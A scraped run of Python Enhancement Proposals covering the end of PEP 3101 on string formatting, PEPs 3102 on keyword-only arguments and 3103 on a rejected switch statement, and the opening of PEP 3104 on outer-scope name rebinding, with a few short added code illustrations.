In general, exceptions generated by the formatter code itself are
of the “ValueError” variety – there is an error in the actual “value”
of the format string. (This is not always true; for example, the
string.format() function might be passed a non-string as its first
parameter, which would result in a TypeError.)
The text associated with these internally generated ValueError
exceptions will indicate the location of the exception inside
the format string, as well as the nature of the exception.
For exceptions generated by user code, a trace record and
dummy frame will be added to the traceback stack to help
in determining the location in the string where the exception
occurred. The inserted traceback will indicate that the
error occurred at:
File "<format_string>;", line XX, in column_YY
where XX and YY represent the line and character position
information in the string, respectively.
Alternate Syntax
Naturally, one of the most contentious issues is the syntax of the
format strings, and in particular the markup conventions used to
indicate fields.
Rather than attempting to exhaustively list all of the various
proposals, I will cover the ones that are most widely used
already.
Shell variable syntax: $name and $(name) (or in some variants,
${name}). This is probably the oldest convention out there, and
is used by Perl and many others. When used without the braces,
the length of the variable is determined by lexically scanning
until an invalid character is found.
This scheme is generally used in cases where interpolation is
implicit - that is, in environments where any string can contain
interpolation variables, and no special substitution function
need be invoked. In such cases, it is important to prevent the
interpolation behavior from occurring accidentally, so the ‘$’
(which is otherwise a relatively uncommonly-used character) is
used to signal when the behavior should occur.
It is the author’s opinion, however, that in cases where the
formatting is explicitly invoked, that less care needs to be
taken to prevent accidental interpolation, in which case a
lighter and less unwieldy syntax can be used.
printf and its cousins (‘%’), including variations that add a
field index, so that fields can be interpolated out of order.
Other bracket-only variations. Various MUDs (Multi-User
Dungeons) such as MUSH have used brackets (e.g. [name]) to do
string interpolation. The Microsoft .Net libraries use braces
({}), and a syntax which is very similar to the one in this
proposal, although the syntax for format specifiers is quite
different. [4]
Backquoting. This method has the benefit of minimal syntactical
clutter, however it lacks many of the benefits of a function
call syntax (such as complex expression arguments, custom
formatters, etc.).
Other variations include Ruby’s #{}, PHP’s {$name}, and so
on.
Some specific aspects of the syntax warrant additional comments:
1) Backslash character for escapes. The original version of
this PEP used backslash rather than doubling to escape a bracket.
This worked because backslashes in Python string literals that
don’t conform to a standard backslash sequence such as \n
are left unmodified. However, this caused a certain amount
of confusion, and led to potential situations of multiple
recursive escapes, i.e. \\\\{ to place a literal backslash
in front of a bracket.
2) The use of the colon character (‘:’) as a separator for
format specifiers. This was chosen simply because that’s
what .Net uses.
Alternate Feature Proposals
Restricting attribute access: An earlier version of the PEP
restricted the ability to access attributes beginning with a
leading underscore, for example “{0}._private”. However, this
is a useful ability to have when debugging, so the feature
was dropped.
Some developers suggested that the ability to do ‘getattr’ and
‘getitem’ access should be dropped entirely. However, this
is in conflict with the needs of another set of developers who
strongly lobbied for the ability to pass in a large dict as a
single argument (without flattening it into individual keyword
arguments using the **kwargs syntax) and then have the format
string refer to dict entries individually.
There have also been suggestions to expand the set of expressions
that are allowed in a format string. However, this was seen
to go against the spirit of TOOWTDI, since the same effect can
be achieved in most cases by executing the same expression on
the parameter before it’s passed in to the formatting function.
For cases where the format string is being used to do arbitrary
formatting in a data-rich environment, it’s recommended to use
a template engine specialized for this purpose, such as
Genshi [5] or Cheetah [6].
Many other features were considered and rejected because they
could easily be achieved by subclassing Formatter instead of
building the feature into the base implementation. This includes
alternate syntax, comments in format strings, and many others.
Security Considerations
Historically, string formatting has been a common source of
security holes in web-based applications, particularly if the
string formatting system allows arbitrary expressions to be
embedded in format strings.
The best way to use string formatting in a way that does not
create potential security holes is to never use format strings
that come from an untrusted source.
Barring that, the next best approach is to ensure that string
formatting has no side effects. Because of the open nature of
Python, it is impossible to guarantee that any non-trivial
operation has this property. What this PEP does is limit the
types of expressions in format strings to those in which visible
side effects are both rare and strongly discouraged by the
culture of Python developers. So for example, attribute access
is allowed because it would be considered pathological to write
code where the mere access of an attribute has visible side
effects (whether the code has invisible side effects - such
as creating a cache entry for faster lookup - is irrelevant.)
Sample Implementation
An implementation of an earlier version of this PEP was created by
Patrick Maupin and Eric V. Smith, and can be found in the pep3101
sandbox at:
http://svn.python.org/view/sandbox/trunk/pep3101/
Backwards Compatibility
Backwards compatibility can be maintained by leaving the existing
mechanisms in place. The new system does not collide with any of
the method names of the existing string formatting techniques, so
both systems can co-exist until it comes time to deprecate the
older system.
References
[1]
Python Library Reference - String formatting operations
http://docs.python.org/library/stdtypes.html#string-formatting-operations
[2]
Python Library References - Template strings
http://docs.python.org/library/string.html#string.Template
[3]
[Python-3000] String formatting operations in python 3k
https://mail.python.org/pipermail/python-3000/2006-April/000285.html
[4]
Composite Formatting - [.Net Framework Developer’s Guide]
http://msdn.microsoft.com/library/en-us/cpguide/html/cpconcompositeformatting.asp?frame=true
[5]
Genshi templating engine.
http://genshi.edgewall.org/
[6]
Cheetah - The Python-Powered Template Engine.
http://www.cheetahtemplate.org/
Copyright
This document has been placed in the public domain.
| Final | PEP 3101 – Advanced String Formatting | Standards Track | This PEP proposes a new system for built-in string formatting
operations, intended as a replacement for the existing ‘%’ string
formatting operator. |
PEP 3102 – Keyword-Only Arguments
Author:
Talin <viridia at gmail.com>
Status:
Final
Type:
Standards Track
Created:
22-Apr-2006
Python-Version:
3.0
Post-History:
28-Apr-2006, 19-May-2006
Table of Contents
Abstract
Rationale
Specification
Function Calling Behavior
Backwards Compatibility
Copyright
Abstract
This PEP proposes a change to the way that function arguments are
assigned to named parameter slots. In particular, it enables the
declaration of “keyword-only” arguments: arguments that can only
be supplied by keyword and which will never be automatically
filled in by a positional argument.
Rationale
The current Python function-calling paradigm allows arguments to
be specified either by position or by keyword. An argument can be
filled in either explicitly by name, or implicitly by position.
There are often cases where it is desirable for a function to take
a variable number of arguments. The Python language supports this
using the ‘varargs’ syntax (*name), which specifies that any
‘left over’ arguments be passed into the varargs parameter as a
tuple.
One limitation on this is that currently, all of the regular
argument slots must be filled before the vararg slot can be.
This is not always desirable. One can easily envision a function
which takes a variable number of arguments, but also takes one
or more ‘options’ in the form of keyword arguments. Currently,
the only way to do this is to define both a varargs argument,
and a ‘keywords’ argument (**kwargs), and then manually extract
the desired keywords from the dictionary.
Specification
Syntactically, the proposed changes are fairly simple. The first
change is to allow regular arguments to appear after a varargs
argument:
def sortwords(*wordlist, case_sensitive=False):
    ...
This function accepts any number of positional arguments, and it
also accepts a keyword option called ‘case_sensitive’. This
option will never be filled in by a positional argument, but
must be explicitly specified by name.
Keyword-only arguments are not required to have a default value.
Since Python requires that all arguments be bound to a value,
and since the only way to bind a value to a keyword-only argument
is via keyword, such arguments are therefore ‘required keyword’
arguments. Such arguments must be supplied by the caller, and
they must be supplied via keyword.
The second syntactical change is to allow the argument name to
be omitted for a varargs argument. The meaning of this is to
allow for keyword-only arguments for functions that would not
otherwise take a varargs argument:
def compare(a, b, *, key=None):
    ...
The reasoning behind this change is as follows. Imagine for a
moment a function which takes several positional arguments, as
well as a keyword argument:
def compare(a, b, key=None):
    ...
Now, suppose you wanted to have ‘key’ be a keyword-only argument.
Under the above syntax, you could accomplish this by adding a
varargs argument immediately before the keyword argument:
def compare(a, b, *ignore, key=None):
    ...
Unfortunately, the ‘ignore’ argument will also suck up any
erroneous positional arguments that may have been supplied by the
caller. Given that we’d prefer any unwanted arguments to raise an
error, we could do this:
def compare(a, b, *ignore, key=None):
    if ignore:  # If ignore is not empty
        raise TypeError
As a convenient shortcut, we can simply omit the ‘ignore’ name,
meaning ‘don’t allow any positional arguments beyond this point’.
(Note: After much discussion of alternative syntax proposals, the
BDFL has pronounced in favor of this ‘single star’ syntax for
indicating the end of positional parameters.)
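A short, runnable illustration of both forms described above (the function
bodies and example data are invented for this sketch):
def sortwords(*wordlist, case_sensitive=False):
    key = None if case_sensitive else str.lower
    return sorted(wordlist, key=key)

print(sortwords('pear', 'Apple', 'banana'))             # ['Apple', 'banana', 'pear']
print(sortwords('pear', 'Apple', case_sensitive=True))  # ['Apple', 'pear']

def compare(a, b, *, key=None):
    if key is not None:
        a, b = key(a), key(b)
    return a == b

print(compare('A', 'a'))                  # False
print(compare('A', 'a', key=str.lower))   # True
# compare('A', 'a', str.lower) would raise TypeError: key must be passed by keyword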
Function Calling Behavior
The previous section describes the difference between the old
behavior and the new. However, it is also useful to have a
description of the new behavior that stands by itself, without
reference to the previous model. So this next section will
attempt to provide such a description.
When a function is called, the input arguments are assigned to
formal parameters as follows:
For each formal parameter, there is a slot which will be used
to contain the value of the argument assigned to that
parameter.
Slots which have had values assigned to them are marked as
‘filled’. Slots which have no value assigned to them yet are
considered ‘empty’.
Initially, all slots are marked as empty.
Positional arguments are assigned first, followed by keyword
arguments.
For each positional argument:
Attempt to bind the argument to the first unfilled
parameter slot. If the slot is not a vararg slot, then
mark the slot as ‘filled’.
If the next unfilled slot is a vararg slot, and it does
not have a name, then it is an error.
Otherwise, if the next unfilled slot is a vararg slot then
all remaining non-keyword arguments are placed into the
vararg slot.
For each keyword argument:
If there is a parameter with the same name as the keyword,
then the argument value is assigned to that parameter slot.
However, if the parameter slot is already filled, then that
is an error.
Otherwise, if there is a ‘keyword dictionary’ argument,
the argument is added to the dictionary using the keyword
name as the dictionary key, unless there is already an
entry with that key, in which case it is an error.
Otherwise, if there is no keyword dictionary, and no
matching named parameter, then it is an error.
Finally:
If the vararg slot is not yet filled, assign an empty tuple
as its value.
For each remaining empty slot: if there is a default value
for that slot, then fill the slot with the default value.
If there is no default value, then it is an error.
In accordance with the current Python implementation, any errors
encountered will be signaled by raising TypeError. (If you want
something different, that’s a subject for a different PEP.)
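To make the slot-filling rules above concrete, here is a small example (the
function signature and call values are invented for illustration):
def f(a, b=10, *rest, option=False, **extra):
    return a, b, rest, option, extra

print(f(1))                        # (1, 10, (), False, {})
print(f(1, 2, 3, 4, option=True))  # (1, 2, (3, 4), True, {})
print(f(1, x=5))                   # (1, 10, (), False, {'x': 5})
# f(1, 2, a=3) raises TypeError: the slot for 'a' is already filled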
Backwards Compatibility
The function calling behavior specified in this PEP is a superset
of the existing behavior - that is, it is expected that any
existing programs will continue to work.
Copyright
This document has been placed in the public domain.
| Final | PEP 3102 – Keyword-Only Arguments | Standards Track | This PEP proposes a change to the way that function arguments are
assigned to named parameter slots. In particular, it enables the
declaration of “keyword-only” arguments: arguments that can only
be supplied by keyword and which will never be automatically
filled in by a positional argument. |
PEP 3103 – A Switch/Case Statement
Author:
Guido van Rossum <guido at python.org>
Status:
Rejected
Type:
Standards Track
Created:
25-Jun-2006
Python-Version:
3.0
Post-History:
26-Jun-2006
Table of Contents
Rejection Notice
Abstract
Rationale
Basic Syntax
Alternative 1
Alternative 2
Alternative 3
Alternative 4
Extended Syntax
Alternative A
Alternative B
Alternative C
Alternative D
Discussion
Semantics
If/Elif Chain vs. Dict-based Dispatch
When to Freeze the Dispatch Dict
Option 1
Option 2
Option 3
Option 4
Conclusion
Copyright
Rejection Notice
A quick poll during my keynote presentation at PyCon 2007 shows this
proposal has no popular support. I therefore reject it.
Abstract
Python-dev has recently seen a flurry of discussion on adding a switch
statement. In this PEP I’m trying to extract my own preferences from
the smorgasbord of proposals, discussing alternatives and explaining
my choices where I can. I’ll also indicate how strongly I feel about
alternatives I discuss.
This PEP should be seen as an alternative to PEP 275. My views are
somewhat different from that PEP’s author, but I’m grateful for the
work done in that PEP.
This PEP introduces canonical names for the many variants that have
been discussed for different aspects of the syntax and semantics, such
as “alternative 1”, “school II”, “option 3” and so on. Hopefully
these names will help the discussion.
Rationale
A common programming idiom is to consider an expression and do
different things depending on its value. This is usually done with a
chain of if/elif tests; I’ll refer to this form as the “if/elif
chain”. There are two main motivations to want to introduce new
syntax for this idiom:
It is repetitive: the variable and the test operator, usually ‘==’
or ‘in’, are repeated in each if/elif branch.
It is inefficient: when an expression matches the last test value
(or no test value at all) it is compared to each of the preceding
test values.
Both of these complaints are relatively mild; there isn’t a lot of
readability or performance to be gained by writing this differently.
Yet, some kind of switch statement is found in many languages and it
is not unreasonable to expect that its addition to Python will allow
us to write up certain code more cleanly and efficiently than before.
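For concreteness, the idiom and the dict-based alternative debated
throughout this PEP look roughly as follows (the example is mine, not
part of the original text):
    # The repetitive if/elif chain that a switch statement would replace:
    def describe(color):
        if color == 'red':
            return 'warm'
        elif color == 'blue':
            return 'cool'
        elif color == 'green':
            return 'fresh'
        else:
            return 'unknown'

    # The hand-written dict-based dispatch that "school II" has in mind:
    _DISPATCH = {'red': 'warm', 'blue': 'cool', 'green': 'fresh'}

    def describe_fast(color):
        return _DISPATCH.get(color, 'unknown')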
There are forms of dispatch that are not suitable for the proposed
switch statement; for example, when the number of cases is not
statically known, or when it is desirable to place the code for
different cases in different classes or files.
Basic Syntax
I’m considering several variants of the syntax first proposed in PEP
275 here. There are lots of other possibilities, but I don’t see that
they add anything.
I’ve recently been converted to alternative 1.
I should note that all alternatives here have the “implicit break”
property: at the end of the suite for a particular case, the control
flow jumps to the end of the whole switch statement. There is no way
to pass control from one case to another. This is in contrast to C,
where an explicit ‘break’ statement is required to prevent falling
through to the next case.
In all alternatives, the else-suite is optional. It is more Pythonic
to use ‘else’ here rather than introducing a new reserved word,
‘default’, as in C.
Semantics are discussed in the next top-level section.
Alternative 1
This is the preferred form in PEP 275:
switch EXPR:
case EXPR:
SUITE
case EXPR:
SUITE
...
else:
SUITE
The main downside is that the suites where all the action is are
indented two levels deep; this can be remedied by indenting the cases
“half a level” (e.g. 2 spaces if the general indentation level is 4).
Alternative 2
This is Fredrik Lundh’s preferred form; it differs by not indenting
the cases:
switch EXPR:
case EXPR:
SUITE
case EXPR:
SUITE
....
else:
SUITE
Some reasons not to choose this include expected difficulties for
auto-indenting editors, folding editors, and the like; and confused
users. There are no situations currently in Python where a line
ending in a colon is followed by an unindented line.
Alternative 3
This is the same as alternative 2 but leaves out the colon after the
switch:
switch EXPR
case EXPR:
SUITE
case EXPR:
SUITE
....
else:
SUITE
The hope of this alternative is that it will upset the auto-indent
logic of the average Python-aware text editor less. But it looks
strange to me.
Alternative 4
This leaves out the ‘case’ keyword on the basis that it is redundant:
switch EXPR:
EXPR:
SUITE
EXPR:
SUITE
...
else:
SUITE
Unfortunately now we are forced to indent the case expressions,
because otherwise (at least in the absence of an ‘else’ keyword) the
parser would have a hard time distinguishing between an unindented
case expression (which continues the switch statement) and an unrelated
statement that starts like an expression (such as an assignment or a
procedure call). The parser is not smart enough to backtrack once it
sees the colon. This is my least favorite alternative.
Extended Syntax
There is one additional concern that needs to be addressed
syntactically. Often two or more values need to be treated the same.
In C, this is done by writing multiple case labels together without any
code between them. The “fall through” semantics then mean that these
are all handled by the same code. Since the Python switch will not
have fall-through semantics (which have yet to find a champion) we
need another solution. Here are some alternatives.
Alternative A
Use:
case EXPR:
to match on a single expression; use:
case EXPR, EXPR, ...:
to match on multiple expressions. This is interpreted so that if EXPR
is a parenthesized tuple or another expression whose value is a tuple,
the switch expression must equal that tuple, not one of its elements.
This means that we cannot use a variable to indicate multiple cases.
While this is also true in C’s switch statement, it is a relatively
common occurrence in Python (see for example sre_compile.py).
Alternative B
Use:
case EXPR:
to match on a single expression; use:
case in EXPR_LIST:
to match on multiple expressions. If EXPR_LIST is a single
expression, the ‘in’ forces its interpretation as an iterable (or
something supporting __contains__, in a minority semantics
alternative). If it is multiple expressions, each of those is
considered for a match.
Alternative C
Use:
case EXPR:
to match on a single expression; use:
case EXPR, EXPR, ...:
to match on multiple expressions (as in alternative A); and use:
case *EXPR:
to match on the elements of an expression whose value is an iterable.
The latter two cases can be combined, so that the true syntax is more
like this:
case [*]EXPR, [*]EXPR, ...:
The * notation is similar to the use of prefix * already in use for
variable-length parameter lists and for passing computed argument
lists, and often proposed for value-unpacking (e.g. a, b, *c = X as
an alternative to (a, b), c = X[:2], X[2:]).
Alternative D
This is a mixture of alternatives B and C; the syntax is like
alternative B but instead of the ‘in’ keyword it uses ‘*’. This is
more limited, but still allows the same flexibility. It uses:
case EXPR:
to match on a single expression and:
case *EXPR:
to match on the elements of an iterable. If one wants to specify
multiple matches in one case, one can write this:
case *(EXPR, EXPR, ...):
or perhaps this (although it’s a bit strange because the relative
priority of ‘*’ and ‘,’ is different than elsewhere):
case * EXPR, EXPR, ...:
Discussion
Alternatives B, C and D are motivated by the desire to specify
multiple cases with the same treatment using a variable representing a
set (usually a tuple) rather than spelling them out. The motivation
for this is usually that if one has several switches over the same set
of cases it’s a shame to have to spell out all the alternatives each
time. An additional motivation is to be able to specify ranges to
be matched easily and efficiently, similar to Pascal’s “1..1000:”
notation. At the same time we want to prevent the kind of mistake
that is common in exception handling (and which will be addressed in
Python 3000 by changing the syntax of the except clause): writing
“case 1, 2:” where “case (1, 2):” was meant, or vice versa.
The case could be made that the need is insufficient for the added
complexity; C doesn’t have a way to express ranges either, and it’s
used a lot more than Pascal these days. Also, if a dispatch method
based on dict lookup is chosen as the semantics, large ranges could be
inefficient (consider range(1, sys.maxint)).
All in all my preferences are (from most to least favorite) B, A, D’,
C, where D’ is D without the third possibility.
Semantics
There are several issues to review before we can choose the right
semantics.
If/Elif Chain vs. Dict-based Dispatch
There are several main schools of thought about the switch statement’s
semantics:
School I wants to define the switch statement in terms of an
equivalent if/elif chain (possibly with some optimization thrown
in).
School II prefers to think of it as a dispatch on a precomputed
dict. There are different choices for when the precomputation
happens.
There’s also school III, which agrees with school I that the
definition of a switch statement should be in terms of an equivalent
if/elif chain, but concedes to the optimization camp that all
expressions involved must be hashable.
We need to further separate school I into school Ia and school Ib:
School Ia has a simple position: a switch statement is translated to
an equivalent if/elif chain, and that’s that. It should not be
linked to optimization at all. That is also my main objection
against this school: without any hint of optimization, the switch
statement isn’t attractive enough to warrant new syntax.
School Ib has a more complex position: it agrees with school II that
optimization is important, and is willing to concede the compiler
certain liberties to allow this. (For example, PEP 275 Solution 1.)
In particular, hash() of the switch and case expressions may or may
not be called (so it should be side-effect-free); and the case
expressions may not be evaluated each time as expected by the
if/elif chain behavior, so the case expressions should also be
side-effect free. My objection to this (elaborated below) is that
if either the hash() or the case expressions aren’t
side-effect-free, optimized and unoptimized code may behave
differently.
School II grew out of the realization that optimization of commonly
found cases isn’t so easy, and that it’s better to face this head on.
This will become clear below.
The differences between school I (mostly school Ib) and school II are
threefold:
When optimizing using a dispatch dict, if either the switch
expression or the case expressions are unhashable (in which case
hash() raises an exception), school Ib requires catching the hash()
failure and falling back to an if/elif chain. School II simply lets
the exception happen. The problem with catching an exception in
hash(), as required by school Ib, is that this may hide a genuine
bug. A possible way out is to only use a dispatch dict if all case
expressions are ints, strings or other built-ins with known good
hash behavior, and to only attempt to hash the switch expression if
it is also one of those types. Type objects should probably also be
supported here. This is the (only) problem that school III
addresses.
When optimizing using a dispatch dict, if the hash() function of any
expression involved returns an incorrect value, under school Ib,
optimized code will not behave the same as unoptimized code. This
is a well-known problem with optimization-related bugs, and wastes
lots of developer time. Under school II, in this situation
incorrect results are produced at least consistently, which should
make debugging a bit easier. The way out proposed for the previous
bullet would also help here.
School Ib doesn’t have a good optimization strategy if the case
expressions are named constants. The compiler cannot know their
values for sure, and it cannot know whether they are truly constant.
As a way out, it has been proposed to re-evaluate the expression
corresponding to the case once the dict has identified which case
should be taken, to verify that the value of the expression didn’t
change. But strictly speaking, all the case expressions occurring
before that case would also have to be checked, in order to preserve
the true if/elif chain semantics, thereby completely killing the
optimization. Another proposed solution is to have callbacks
notifying the dispatch dict of changes in the value of variables or
attributes involved in the case expressions. But this is not likely
implementable in the general case, and would require many namespaces
to bear the burden of supporting such callbacks, which currently
don’t exist at all.
Finally, there’s a difference of opinion regarding the treatment of
duplicate cases (i.e. two or more cases with match expressions that
evaluate to the same value). School I wants to treat this the same
as an if/elif chain would treat it (i.e. the first match wins and
the code for the second match is silently unreachable); school II
wants this to be an error at the time the dispatch dict is frozen
(so dead code doesn’t go undiagnosed).
School I sees trouble in school II’s approach of pre-freezing a
dispatch dict because it places a new and unusual burden on
programmers to understand exactly what kinds of case values are
allowed to be frozen and when the case values will be frozen, or they
might be surprised by the switch statement’s behavior.
School II doesn’t believe that school Ia’s unoptimized switch is worth
the effort, and it sees trouble in school Ib’s proposal for
optimization, which can cause optimized and unoptimized code to behave
differently.
In addition, school II sees little value in allowing cases involving
unhashable values; after all if the user expects such values, they can
just as easily write an if/elif chain. School II also doesn’t believe
that it’s right to allow dead code due to overlapping cases to occur
unflagged, when the dict-based dispatch implementation makes it so
easy to trap this.
However, there are some use cases for overlapping/duplicate cases.
Suppose you’re switching on some OS-specific constants (e.g. exported
by the os module or some module like that). You have a case for each.
But on some OS, two different constants have the same value (since on
that OS they are implemented the same way – like O_TEXT and O_BINARY
on Unix). If duplicate cases are flagged as errors, your switch
wouldn’t work at all on that OS. It would be much better if you could
arrange the cases so that one case has preference over another.
There’s also the (more likely) use case where you have a set of cases
to be treated the same, but one member of the set must be treated
differently. It would be convenient to put the exception in an
earlier case and be done with it.
(Yes, it seems a shame not to be able to diagnose dead code due to
accidental case duplication. Maybe that’s less important, and
pychecker can deal with it? After all we don’t diagnose duplicate
method definitions either.)
This suggests school IIb: like school II but redundant cases must be
resolved by choosing the first match. This is trivial to implement
when building the dispatch dict (skip keys already present).
(An alternative would be to introduce new syntax to indicate “okay to
have overlapping cases” or “ok if this case is dead code” but I find
that overkill.)
Personally, I’m in school II: I believe that the dict-based dispatch
is the one true implementation for switch statements and that we
should face the limitations up front, so that we can reap maximal
benefits. I’m leaning towards school IIb – duplicate cases should be
resolved by the ordering of the cases instead of flagged as errors.
When to Freeze the Dispatch Dict
For the supporters of school II (dict-based dispatch), the next big
dividing issue is when to create the dict used for switching. I call
this “freezing the dict”.
The main problem that makes this interesting is the observation that
Python doesn’t have named compile-time constants. What is
conceptually a constant, such as re.IGNORECASE, is a variable to the
compiler, and there’s nothing to stop crooked code from modifying its
value.
Option 1
The most limiting option is to freeze the dict in the compiler. This
would require that the case expressions are all literals or
compile-time expressions involving only literals and operators whose
semantics are known to the compiler, since with the current state of
Python’s dynamic semantics and single-module compilation, there is no
hope for the compiler to know with sufficient certainty the values of
any variables occurring in such expressions. This is widely though
not universally considered too restrictive.
Raymond Hettinger is the main advocate of this approach. He proposes
a syntax where only a single literal of certain types is allowed as
the case expression. It has the advantage of being unambiguous and
easy to implement.
My main complaint about this is that by disallowing “named constants”
we force programmers to give up good habits. Named constants are
introduced in most languages to solve the problem of “magic numbers”
occurring in the source code. For example, sys.maxint is a lot more
readable than 2147483647. Raymond proposes to use string literals
instead of named “enums”, observing that the string literal’s content
can be the name that the constant would otherwise have. Thus, we
could write “case ‘IGNORECASE’:” instead of “case re.IGNORECASE:”.
However, if there is a spelling error in the string literal, the case
will silently be ignored, and who knows when the bug is detected. If
there is a spelling error in a NAME, however, the error will be caught
as soon as it is evaluated. Also, sometimes the constants are
externally defined (e.g. when parsing a file format like JPEG) and we
can’t easily choose appropriate string values. Using an explicit
mapping dict sounds like a poor hack.
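The difference in failure modes can be seen today with a hand-written
dispatch dict (my illustration, not the PEP’s):
    import re

    flags_by_name = {'IGNORECASE': re.IGNORECASE, 'MULTILINE': re.MULTILINE}

    # A misspelled string key fails silently -- the lookup simply misses:
    flags_by_name.get('IGNORECASEE')     # returns None, no error is raised

    # A misspelled name fails loudly as soon as it is evaluated:
    # re.IGNORECASEE                     # AttributeError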
Option 2
The oldest proposal to deal with this is to freeze the dispatch dict
the first time the switch is executed. At this point we can assume
that all the named “constants” (constant in the programmer’s mind,
though not to the compiler) used as case expressions are defined –
otherwise an if/elif chain would have little chance of success either.
Assuming the switch will be executed many times, doing some extra work
the first time pays back quickly by very quick dispatch times later.
An objection to this option is that there is no obvious object where
the dispatch dict can be stored. It can’t be stored on the code
object, which is supposed to be immutable; it can’t be stored on the
function object, since many function objects may be created for the
same function (e.g. for nested functions). In practice, I’m sure that
something can be found; it could be stored in a section of the code
object that’s not considered when comparing two code objects or when
pickling or marshalling a code object; or all switches could be stored
in a dict indexed by weak references to code objects. The solution
should also be careful not to leak switch dicts between multiple
interpreters.
Another objection is that the first-use rule allows obfuscated code
like this:
def foo(x, y):
switch x:
case y:
print 42
To the untrained eye (not familiar with Python) this code would be
equivalent to this:
def foo(x, y):
if x == y:
print 42
but that’s not what it does (unless it is always called with the same
value as the second argument). This has been addressed by suggesting
that the case expressions should not be allowed to reference local
variables, but this is somewhat arbitrary.
A final objection is that in a multi-threaded application, the
first-use rule requires intricate locking in order to guarantee the
correct semantics. (The first-use rule suggests a promise that side
effects of case expressions are incurred exactly once.) This may be
as tricky as the import lock has proved to be, since the lock has to
be held while all the case expressions are being evaluated.
Option 3
A proposal that has been winning support (including mine) is to freeze
a switch’s dict when the innermost function containing it is defined.
The switch dict is stored on the function object, just as parameter
defaults are, and in fact the case expressions are evaluated at the
same time and in the same scope as the parameter defaults (i.e. in the
scope containing the function definition).
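Since the proposed syntax was never implemented, the closest existing
analogy is the evaluation of parameter defaults at function definition
time (the sketch below is mine, not the PEP’s):
    FLAG = 1

    def handler(value, _frozen=FLAG):   # the default is evaluated when 'def' runs
        return value == _frozen

    FLAG = 2                            # later rebinding does not affect handler()
    print(handler(1))                   # True: the value 1 was captured at def time
    print(handler(2))                   # False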
This option has the advantage of avoiding many of the finesses needed
to make option 2 work: there’s no need for locking, no worry about
immutable code objects or multiple interpreters. It also provides a
clear explanation for why locals can’t be referenced in case
expressions.
This option works just as well for situations where one would
typically use a switch; case expressions involving imported or global
named constants work exactly the same way as in option 2, as long as
they are imported or defined before the function definition is
encountered.
A downside however is that the dispatch dict for a switch inside a
nested function must be recomputed each time the nested function is
defined. For certain “functional” styles of programming this may make
switch unattractive in nested functions. (Unless all case expressions
are compile-time constants; then the compiler is of course free to
optimize away the switch freezing code and make the dispatch table part
of the code object.)
Another downside is that under this option, there’s no clear moment
when the dispatch dict is frozen for a switch that doesn’t occur
inside a function. There are a few pragmatic choices for how to treat
a switch outside a function:
(a) Disallow it.
(b) Translate it into an if/elif chain.
(c) Allow only compile-time constant expressions.
(d) Compute the dispatch dict each time the switch is reached.
(e) Like (b) but tests that all expressions evaluated are hashable.
Of these, (a) seems too restrictive: it’s uniformly worse than (c);
and (d) has poor performance for little or no benefits compared to
(b). It doesn’t make sense to have a performance-critical inner loop
at the module level, as all local variable references are slow there;
hence (b) is my (weak) favorite. Perhaps I should favor (e), which
attempts to prevent atypical use of a switch; examples that work
interactively but not in a function are annoying. In the end I don’t
think this issue is all that important (except it must be resolved
somehow) and am willing to leave it up to whoever ends up implementing
it.
When a switch occurs in a class but not in a function, we can freeze
the dispatch dict at the same time the temporary function object
representing the class body is created. This means the case
expressions can reference module globals but not class variables.
Alternatively, if we choose (b) above, we could choose this
implementation inside a class definition as well.
Option 4
There are a number of proposals to add a construct to the language
that makes the concept of a value pre-computed at function definition
time generally available, without tying it either to parameter default
values or case expressions. Some keywords proposed include ‘const’,
‘static’, ‘only’ or ‘cached’. The associated syntax and semantics
vary.
These proposals are out of scope for this PEP, except to suggest that
if such a proposal is accepted, there are two ways for the switch to
benefit: we could require case expressions to be either compile-time
constants or pre-computed values; or we could make pre-computed values
the default (and only) evaluation mode for case expressions. The
latter would be my preference, since I don’t see a use for more
dynamic case expressions that isn’t addressed adequately by writing an
explicit if/elif chain.
Conclusion
It is too early to decide. I’d like to see at least one completed
proposal for pre-computed values before deciding. In the meantime,
Python is fine without a switch statement, and perhaps those who claim
it would be a mistake to add one are right.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 3103 – A Switch/Case Statement | Standards Track | Python-dev has recently seen a flurry of discussion on adding a switch
statement. In this PEP I’m trying to extract my own preferences from
the smorgasbord of proposals, discussing alternatives and explaining
my choices where I can. I’ll also indicate how strongly I feel about
alternatives I discuss. |
PEP 3104 – Access to Names in Outer Scopes
Author:
Ka-Ping Yee <ping at zesty.ca>
Status:
Final
Type:
Standards Track
Created:
12-Oct-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Other Languages
JavaScript, Perl, Scheme, Smalltalk, GNU C, C# 2.0
Ruby (as of 1.8)
Overview of Proposals
New Syntax in the Binding (Outer) Scope
Scope Override Declaration
Required Variable Declaration
New Syntax in the Referring (Inner) Scope
Outer Reference Expression
Rebinding Operator
Scope Override Declaration
Proposed Solution
Backward Compatibility
References
Acknowledgements
Copyright
Abstract
In most languages that support nested scopes, code can refer to or
rebind (assign to) any name in the nearest enclosing scope.
Currently, Python code can refer to a name in any enclosing scope,
but it can only rebind names in two scopes: the local scope (by
simple assignment) or the module-global scope (using a global
declaration).
This limitation has been raised many times on the Python-Dev mailing
list and elsewhere, and has led to extended discussion and many
proposals for ways to remove this limitation. This PEP summarizes
the various alternatives that have been suggested, together with
advantages and disadvantages that have been mentioned for each.
Rationale
Before version 2.1, Python’s treatment of scopes resembled that of
standard C: within a file there were only two levels of scope, global
and local. In C, this is a natural consequence of the fact that
function definitions cannot be nested. But in Python, though
functions are usually defined at the top level, a function definition
can be executed anywhere. This gave Python the syntactic appearance
of nested scoping without the semantics, and yielded inconsistencies
that were surprising to some programmers – for example, a recursive
function that worked at the top level would cease to work when moved
inside another function, because the recursive function’s own name
would no longer be visible in its body’s scope. This violates the
intuition that a function should behave consistently when placed in
different contexts. Here’s an example:
def enclosing_function():
def factorial(n):
if n < 2:
return 1
return n * factorial(n - 1) # fails with NameError
print factorial(5)
Python 2.1 moved closer to static nested scoping by making visible
the names bound in all enclosing scopes (see PEP 227). This change
makes the above code example work as expected. However, because any
assignment to a name implicitly declares that name to be local, it is
impossible to rebind a name in an outer scope (except when a
global declaration forces the name to be global). Thus, the
following code, intended to display a number that can be incremented
and decremented by clicking buttons, doesn’t work as someone familiar
with lexical scoping might expect:
def make_scoreboard(frame, score=0):
label = Label(frame)
label.pack()
for i in [-10, -1, 1, 10]:
def increment(step=i):
score = score + step # fails with UnboundLocalError
label['text'] = score
button = Button(frame, text='%+d' % i, command=increment)
button.pack()
return label
Python syntax doesn’t provide a way to indicate that the name
score mentioned in increment refers to the variable score
bound in make_scoreboard, not a local variable in increment.
Users and developers of Python have expressed an interest in removing
